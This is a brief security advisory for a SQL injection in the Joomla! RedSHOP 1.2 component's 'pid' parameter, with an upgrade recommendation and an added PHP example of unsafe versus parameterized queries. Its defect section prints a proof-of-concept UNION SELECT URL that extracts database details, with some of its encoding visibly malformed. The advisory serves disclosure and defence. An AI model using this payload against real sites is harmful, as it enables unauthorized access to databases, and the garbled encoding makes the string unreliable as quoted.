--------------------------------------------
Joomla! RedSHOP component v1.2 SQL Injection
--------------------------------------------

= overview =

- Affected products: Joomla! RedSHOP component
- http://redcomponent.com/redcomponent/redshop
- Developer: redcomponent
- Affected version: 1.2; other versions may also be affected
- Vulnerability discoverer: Matias Fontanini

= defect =

When handling the "addtocompare" task, the component does not correctly sanitize the "pid" parameter before using it to construct SQL queries, making it vulnerable to SQL injection attacks. The following proof-of-concept request retrieves the database user, name and version:

http://www.bkjia.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%,,34,63%23&cmd=add&cid=20&sid=0.6886686905513422

= solution =

Upgrade to version 1.3.
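
The defect described above, next to one way to close it. This is an added example, not redSHOP's code or the vendor's 1.3 fix. The table, column and function names are assumptions, the double-quoted query shape is inferred from the %22 in the request, and an in-memory SQLite database stands in for Joomla's database layer.

```php
<?php
// Added example: constructed schema and hypothetical function names, not redSHOP code.

// Vulnerable pattern from the advisory: pid is pasted straight into the SQL text.
function buildCompareQueryUnsafe(string $pid): string
{
    return 'SELECT product_id, product_name FROM product WHERE product_id = "' . $pid . '"';
}

// Hardened step 1: accept only a positive integer; anything else becomes null.
function parsePid($raw): ?int
{
    $pid = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $pid === false ? null : $pid;
}

// Hardened step 2: bind the validated value as a typed parameter.
function findProductForCompare(PDO $db, $rawPid): ?array
{
    $pid = parsePid($rawPid);
    if ($pid === null) {
        return null; // reject the request instead of querying
    }
    $stmt = $db->prepare('SELECT product_id, product_name FROM product WHERE product_id = :pid');
    $stmt->bindValue(':pid', $pid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE product (product_id INTEGER PRIMARY KEY, product_name TEXT)');
$db->exec("INSERT INTO product VALUES (24, 'Sample product')");

// Constructed input: a pid that closes the quoted value, as in the advisory's request.
$tampered = '24" and 1=0';

// Unsafe builder: the text after the quote has become part of the statement.
echo buildCompareQueryUnsafe($tampered), PHP_EOL;

// Hardened path: a numeric pid returns its row, the tampered pid never reaches the database.
var_dump(findProductForCompare($db, '24'));
var_dump(findProductForCompare($db, $tampered));
```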